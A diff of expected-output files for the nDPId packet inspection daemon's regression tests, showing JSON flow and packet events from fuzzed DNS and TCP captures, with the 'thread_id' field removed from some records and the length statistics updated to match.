00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471077370,"flow_last_seen":1120471077370,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471077370,"flow_last_seen":1120471077370,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":677,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":2,"flow_last_seen":1120471078365,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471078365,"pkt":"ADBUADRWAODtAW69CABFAABIbGEAAIARSvDAqAECwKgBAQsNADUANFmE0DMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":677,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":2,"flow_last_seen":1120471078365,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471078365,"pkt":"ADBUADRWAODtAW69CABFAABIbGEAAIARSvDAqAECwKgBAQsNADUANFmE0DMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00414{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":678,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120471078365,"pkt":"ADBUADRWAODtAW69CABFAABjbGIAAIARSu\/AqAECwKgBAQsNADUANFmE0DMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3muZXJjaXR5AmRrAAAhAAE="} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":678,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120471078365,"pkt":"ADBUADRWAODtAW69CABFAABjbGIAAIARSu\/AqAECwKgBAQsNADUANFmE0DMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3muZXJjaXR5AmRrAAAhAAE="}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":678,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120471080368} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":678,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120471080368}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":679,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471082371,"flow_last_seen":1120471082371,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471082371,"l3_proto":"ip4","src_ip":"192.168.54.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":679,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471082371,"flow_last_seen":1120471082371,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471082371,"l3_proto":"ip4","src_ip":"192.168.54.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":679,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1120471082371,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471082371,"pkt":"ADBUADRWAODtAW69CABFAABIbGMAAIARSu7AqDYCwKgBAQsNADUANFmE0DMBAAABAAAAAAAABF9zaXAEX3VkcCVzAHAJY2liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":679,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1120471082371,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471082371,"pkt":"ADBUADRWAODtAW69CABFAABIbGMAAIARSu7AqDYCwKgBAQsNADUANFmE0DMBAAABAAAAAAAABF9zaXAEX3VkcCVzAHAJY2liZXJjaXR5AmRrAAAhAAE="}
00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":679,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471082371,"flow_last_seen":1120471082371,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471082371,"l3_proto":"ip4","src_ip":"192.168.54.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":28681,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":679,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471082371,"flow_last_seen":1120471082371,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471082371,"l3_proto":"ip4","src_ip":"192.168.54.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":28681,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -1355,8 +1355,8 @@
00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":688,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471094410,"flow_last_seen":1120471094412,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471094412,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":688,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471094410,"flow_last_seen":1120471094412,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471094412,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":690,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470916875,"flow_last_seen":1120470916875,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120471094413,"l3_proto":"ip4","src_ip":"192.168.233.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2811,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":690,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470916875,"flow_last_seen":1120470916875,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120471094413,"l3_proto":"ip4","src_ip":"192.168.233.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2811,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":690,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470916873,"flow_last_seen":1120470916873,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471094413,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2811,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":690,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470916873,"flow_last_seen":1120470916873,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471094413,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2811,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00413{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":690,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120471094413,"pkt":"ADBUADRWAODtAW69CABFAABIbG4A3oARSuPAqAECwKgBAQsQJXMANDd+8jYBAFEBAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":690,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120471094413,"pkt":"ADBUADRWAODtAW69CABFAABIbG4A3oARSuPAqAECwKgBAQsQJXMANDd+8jYBAFEBAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":690,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120471106433} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":690,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120471106433}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471107427,"flow_last_seen":1120471107427,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2832,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471107427,"flow_last_seen":1120471107427,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2832,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":1120471107427,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471107427,"pkt":"ADBUADRWAODtAW69CABFAABIbJIAAIARSuLAqAECwKgBAQsQADUANDd+8jYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":1120471107427,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471107427,"pkt":"ADBUADRWAODtAW69CABFAABIbJIAAIARSuLAqAECwKgBAQsQADUANDd+8jYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471107427,"flow_last_seen":1120471107427,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2832,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471107427,"flow_last_seen":1120471107427,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2832,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -1445,6 +1445,6 @@
~~ total memory freed........: 5050680 bytes ~~ total memory freed........: 5050680 bytes
~~ total allocations/frees...: 102772/102772 ~~ total allocations/frees...: 102772/102772
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ json string min len.......: 214 chars ~~ json string min len.......: 200 chars
~~ json string max len.......: 1897 chars ~~ json string max len.......: 1897 chars
~~ json string avg len.......: 1055 chars ~~ json string avg len.......: 1048 chars

60
test/results/fuzz-2006-09-29-28586.pcap.out
View File

@@ -1,13 +1,13 @@
00472{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00472{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00479{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":2,"global_ts_msec":1031854484481} 00479{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":2,"global_ts_msec":1031854484481}
00365{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":2304,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"CAAgsl17AFCLk5N8CQBFAAAo8EpAAIAGrEqsFAMFrBQDDQooAFDkFf3+yWv\/bVARIal6iQAABIGD1GDD"} 00351{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":2304,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"CAAgsl17AFCLk5N8CQBFAAAo8EpAAIAGrEqsFAMFrBQDDQooAFDkFf3+yWv\/bVARIal6iQAABIGD1GDD"}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":2304,"global_ts_msec":1031854484481} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":2304,"global_ts_msec":1031854484481}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854484481,"flow_last_seen":1031854484481,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854484481,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854484481,"flow_last_seen":1031854484481,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854484481,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1031854484481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854484481,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKVAAEAGF\/CsFAMNrBQDBQBQCijJa\/9t5BX9\/1AQgywZBgAA"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1031854484481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854484481,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKVAAEAGF\/CsFAMNrBQDBQBQCijJa\/9t5BX9\/1AQgywZBgAA"}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1031854484481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854484481,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKZAAEAGF++sFAMNrBQDBQBQCijJa\/9t5BX9\/1ARgywZBQAA"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1031854484481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854484481,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKZAAEAGF++sFAMNrBQDBQBQCijJa\/9t5BX9\/1ARgywZBQAA"}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1031854484482,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854484482,"pkt":"CAAgsl17AFCLk5N8CABFAAAo8UpAAIAGq0qsFAMFrBQDDQooAFDkFf3\/yWv\/blAQIal6iAAABIGD1GDD"} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1031854484482,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854484482,"pkt":"CAAgsl17AFCLk5N8CABFAAAo8UpAAIAGq0qsFAMFrBQDDQooAFDkFf3\/yWv\/blAQIal6iAAABIGD1GDD"}
00376{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":5,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":2246,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1031854484482,"pkt":"CAAgsl17AFCLk5J8CMZFAAAs9EpAAIAGqEasFAMFrBQDDQopAFDkS6qJAAAAACUCMACAnQAAuAQFtGBh"} 00362{"packet_event_id":1,"packet_event_name":"packet","packet_id":5,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":2246,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1031854484482,"pkt":"CAAgsl17AFCLk5J8CMZFAAAs9EpAAIAGqEasFAMFrBQDDQopAFDkS6qJAAAAACUCMACAnQAAuAQFtGBh"}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":5,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":2246,"global_ts_msec":1031854488666} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":5,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":2246,"global_ts_msec":1031854488666}
